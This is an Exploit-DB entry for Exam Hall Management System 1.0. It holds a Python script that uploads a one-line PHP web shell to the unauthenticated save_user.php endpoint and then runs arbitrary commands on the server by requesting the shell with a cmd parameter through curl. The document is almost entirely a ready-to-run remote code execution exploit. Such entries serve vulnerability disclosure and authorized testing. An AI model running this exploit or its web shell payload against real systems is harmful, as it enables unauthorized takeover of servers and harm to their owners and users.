Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)

EDB-ID:

50111

CVE:

N/A




Platform:

PHP

Date:

2021-07-08


# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
# Exploit Author: Davide 'yth1n' Bianchin
# Contacts: davide dot bianchin at dedagroup dot it
# Original PoC: https://exploit-db.com/exploits/50103
# Date: 06.07.2021
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
# Version: 1.0
# Tested on: Kali Linux

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import os
import sys
import string
import random
import time

host = 'localhost' #CHANGETHIS
path = 'SourceCode' #CHANGETHIS

url = 'http://'+host+'/'+path+'/pages/save_user.php'

def id_generator(size=6, chars=string.ascii_lowercase):
	return ''.join(random.choice(chars) for _ in range(size))+'.php'

if len(sys.argv) == 1:
    print("#########")
    print("Usage: python3 examhallrce.py command")
    print("Usage: Use the char + to concatenate commands")
    print("Example: python3 examhallrce.py whoami")
    print("Example: python3 examhallrce.py ls+-la")
    print("#########")
    exit()


filename = id_generator()
print("Generated "+filename+ " file..")
time.sleep(2)
print("Uploading file..")
time.sleep(2)

   


def reverse():
    command = sys.argv[1]
    multipart_data = MultipartEncoder({
        'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'),
        'btn_save': ''
        })
    r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type})   
    endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' 
    urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''
    print("Success, file correctly uploaded at: " +endpoint+ "")
    time.sleep(1) 
    print("Executing command in 1 seconds:\n")
    time.sleep(1)
    os.system("curl -X GET "+urlo+"")

reverse()